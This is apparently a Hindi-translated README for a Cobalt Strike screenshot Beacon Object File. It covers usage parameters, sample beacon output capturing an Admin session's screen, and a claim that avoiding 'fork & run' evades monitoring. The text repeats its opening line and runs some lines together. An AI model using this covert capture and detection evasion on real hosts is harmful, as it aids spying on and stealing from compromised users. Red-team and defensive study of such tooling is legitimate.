
Cobalt Strike के लिए एक वैकल्पिक स्क्रीनशॉट क्षमता जो WinAPI का उपयोग करती है और fork & run नहीं करती। स्क्रीनशॉट मेमोरी में डाउनलोड किया जाता है।
Cobalt Strike के लिए एक वैकल्पिक स्क्रीनशॉट क्षमता जो WinAPI का उपयोग करती है और fork & run नहीं करती। स्क्रीनशॉट मेमोरी में डाउनलोड होता है।
make चलाएँ0: पूर्ण स्क्रीन कैप्चर करें (PID = 0) विशिष्ट PID: विशिष्ट PID कैप्चर करें (न्यूनतम होने पर भी काम करता है!)
screenshot_bof चलाने पर एक GUI संवाद पॉप होगाbeacon> screenshot_bof file.jpg 2 21964 0 90 100
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 12421 bytes
[+] received output:
Downloading JPEG over beacon as a screenshot with filename file.jpg
[*] received screenshot of Screenshot from Admin (26kb)
[+] received output:
Screenshot saved/downloaded successfully
Cobalt Strike अपनी कई पोस्ट-एक्स क्षमताओं के लिए fork & run नामक तकनीक का उपयोग करता है, जिसमें स्क्रीनशॉट कमांड भी शामिल है। जबकि यह व्यवहार स्थिरता प्रदान करता है, अब यह अच्छी तरह से ज्ञात है और इसकी भारी निगरानी की जाती है। यह BOF स्क्रीनशॉट क्षमता का अधिक OPSEC सुरक्षित संस्करण प्रदान करने के लिए है।
सामान्य अस्वीकरण यहाँ, मैं इस खराब लिखित कोड का उपयोग करके आपके द्वारा किए जाने वाले किसी भी मानवता के विरुद्ध अपराधों या परमाणु युद्ध के लिए जिम्मेदार नहीं हूँ।